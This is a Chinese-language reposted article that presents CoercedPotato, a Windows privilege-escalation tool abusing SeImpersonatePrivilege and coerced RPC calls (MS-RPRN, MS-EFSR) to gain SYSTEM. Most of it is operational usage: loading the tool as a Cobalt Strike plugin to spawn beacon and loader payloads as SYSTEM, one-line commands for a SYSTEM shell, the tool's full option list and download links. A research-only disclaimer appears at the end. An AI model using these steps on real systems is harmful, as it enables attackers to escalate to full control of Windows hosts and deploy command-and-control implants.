项目简介
通过在Windows 10、Windows 11和Server 2022上滥用SeImpersonatePrivilege特权和MS-RPRN函数将LOCAL/NETWORK SERVICE提升为SYSTEM。
工具使用
首先需要使用RPC侦听器生成
然后你可以触发一个SYSTEM调用
![CoercedPotato反射DLL利用工具 CoercedPotato反射DLL利用工具]()
![CoercedPotato反射DLL利用工具 CoercedPotato反射DLL利用工具]()
一、cna插件利用
克隆此存储库并在VisualStudio中编译项目,然后到CobaltStrike中加载dist/coercedpotato.cna
spawn ProcessToSpawn OptionalCmdArgument CoercedPotato
例如:
CoercedPotato spawn C:WindowsTempbeacon.exe
CoercedPotato spawn C:WindowsTemploader.exe C:WindowsTempbeacon.bin
coerce CoercedPotato
二、exe落地利用
非常快速POC:
.CoercedPotato.exe -c whoami
交互式shell的PoC:
.CoercedPotato.exe -c cmd.exe
可以使用--help选项检查帮助消息。
CoercedPotato is an automated tool for privilege escalation exploit using SeImpersonatePrivilege or SeImpersonatePrimaryToken.
Usage: .CoercedPotato.exe [OPTIONS]
Options:
-h,--help Print this help message and exit
-c,--command TEXT REQUIRED Program to execute as SYSTEM (i.e. cmd.exe)
-i,--interface TEXT Optionnal interface to use (default : ALL) (Possible values : ms-rprn, ms-efsr
-n,--exploitId INT Optionnal exploit ID (Only usuable if interface is defined)
-> ms-rprn :
[0] RpcRemoteFindFirstPrinterChangeNotificationEx()
[1] RpcRemoteFindFirstPrinterChangeNotification()
-> ms-efsr
[0] EfsRpcOpenFileRaw()
[1] EfsRpcEncryptFileSrv()
[2] EfsRpcDecryptFileSrv()
[3] EfsRpcQueryUsersOnFile()
[4] EfsRpcQueryRecoveryAgents()
[5] EfsRpcRemoveUsersFromFile()
[6] EfsRpcAddUsersToFile()
[7] EfsRpcFileKeyInfo() # NOT WORKING
[8] EfsRpcDuplicateEncryptionInfoFile()
[9] EfsRpcAddUsersToFileEx()
[10] EfsRpcFileKeyInfoEx() # NOT WORKING
[11] EfsRpcGetEncryptedFileMetadata()
[12] EfsRpcEncryptFileExSrv()
[13] EfsRpcQueryProtectors()
-f,--force BOOLEAN Force all RPC functions even if it says 'Exploit worked!' (Default value : false)
--interactive BOOLEAN Set wether the process should be run within the same shell or open a new window. (Default value : true)
下载地址
https://github.com/Prepouce/CoercedPotatohttps://github.com/sokaRepo/CoercedPotatoRDLL
https://github.com/Prepouce/CoercedPotatohttps://github.com/sokaRepo/CoercedPotatoRDLL
原文始发于微信公众号(Hack分享吧):CoercedPotato反射DLL利用工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论